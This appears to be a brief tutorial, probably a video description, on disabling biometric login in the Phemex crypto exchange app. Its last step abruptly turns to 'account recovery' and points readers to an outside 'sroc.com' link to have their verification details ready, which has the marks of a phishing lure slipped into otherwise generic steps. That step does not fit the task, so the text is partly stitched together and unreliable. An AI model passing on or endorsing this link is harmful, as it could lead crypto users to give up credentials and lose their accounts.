I hit this issue today, and here is the quick fix that solved it. If you're looking to disable biometric login on Phemex, follow these straightforward steps. Step 1. Open the Phemex app. Launch the Phemex application on your mobile device. Make sure you are logged into your account to access the settings. Step 2. Navigate to Settings. Once you're in the app, locate the Settings menu, usually represented by gear icon. Tap on it to enter the settings. Step 3. Find Security Options. Scroll through the Settings menu until you find the Security or Privacy options. This is where you can manage your login methods. Step 4. Disable biometric login. In the Security options, look for the toggle switch or checkbox for biometric login. Turn it off to disable this feature. Note, if you don't see the toggle, ensure your app is updated to the latest version. Step 5. Confirm changes. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. That's it. You've successfully disabled biometric login on Phemex. If you have any questions or run into issues, feel free to reach out. Happy trading!